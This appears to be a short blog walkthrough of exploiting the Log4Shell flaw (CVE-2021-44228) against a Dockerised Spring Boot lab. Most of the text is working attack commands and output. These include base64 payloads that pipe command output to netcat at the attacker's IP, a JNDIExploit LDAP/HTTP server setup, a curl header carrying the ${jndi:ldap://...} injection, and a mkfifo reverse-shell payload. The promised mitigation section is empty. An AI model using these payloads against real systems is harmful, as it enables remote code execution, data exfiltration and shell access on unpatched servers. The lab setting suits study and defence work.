CVE-2021–44228 — Log4shell
Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)
For this exercise I will be targeting hosted docker with a vulnerable java application, you can find it here:
https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
Exploitation:
First we need to Write the command in base64:
└──╼ #echo "ls | nc 172.20.10.2 80" | base64bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo=
After that we need to host the vulnerable LDAP server & the HTTP server.
The below jar file will do the following:
- Host LDAP server.
- Host HTTP server.
- Create .class file based on the base64 payload
└──╼ #java -jar JNDIExploit-1.2-SNAPSHOT.jarError: The following option is required: [-i | --ip]Usage: java -jar JNDIExploit-1.2-SNAPSHOT.jar [options] Options: * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false) -h, --help Show this help
└──╼ #java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.20.10.2 -l 1234 -p 800[+] LDAP Server Start Listening on 1234...[+] HTTP Server Start Listening on 800...
If we run the exploit using the below curl command — we are sending the IP for our malicious LDAP server that was created in the previous step — and we also send the base64 command:
└──╼ #curl 172.17.0.1:8080 -H 'X-Api-Version: ${jnd i:ldap://172.20.10.2:1234/Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo=}'Hello, world!
The LDAP server should get a request from the victim machine — and then LDAP server will redirect the machine to our malicious HTTP server that hosts the .class exploit:
└──╼ #java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.20.10.2 -l 1234 -p 800[+] LDAP Server Start Listening on 1234...[+] HTTP Server Start Listening on 800...
[+] Received LDAP Query: Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo=[+] Paylaod: command[+] Command: ls | nc 172.20.10.2 80
[+] Sending LDAP ResourceRef result for Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo= with basic remote reference payload[+] Send LDAP reference result for Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo= redirecting to http://172.20.10.2:800/ExploitcjWF0rQsqL.class[+] New HTTP Request From /172.17.0.2:55030 /ExploitcjWF0rQsqL.class[+] Receive ClassRequest: ExploitcjWF0rQsqL.class[+] Response Code: 200
Then we should receive the output of the command as shown below:
└──╼ #nc -lvnp 80listening on [any] 80 ...connect to [172.20.10.2] from (UNKNOWN) [172.17.0.2] 33701appbindevetchomelibmediamntprocrootrunsbinsrvsystmpusrvar
Getting Shell:
- Create the payload:
└──╼ #echo "rm f;mkfifo f;cat f|sh -i 2>&1|nc 172.20.10.2 80 >f" | base64cm0gZjtta2ZpZm8gZjtjYXQgZnxzaCAtaSAyPiYxfG5jIDE3Mi4yMC4xMC4yIDgwID5mCg=
- Send the exploit:
└──╼ #curl 172.17.0.1:8080 -H 'X-Api-Version: ${jn di:ldap://172.20.10.2:1234/Basic/Command/Base64/cm0gZjtta2ZpZm8gZjtjYXQgZnxzaCAtaSAyPiYxfG5jIDE3Mi4yMC4xMC4yIDgwID5mCg==}'
- Finally. getting the shell
Mitigation:
The below topology will show how to mitigate the attack in each step possible:
More vulnerable applications
Minecraft:
Ghidra:
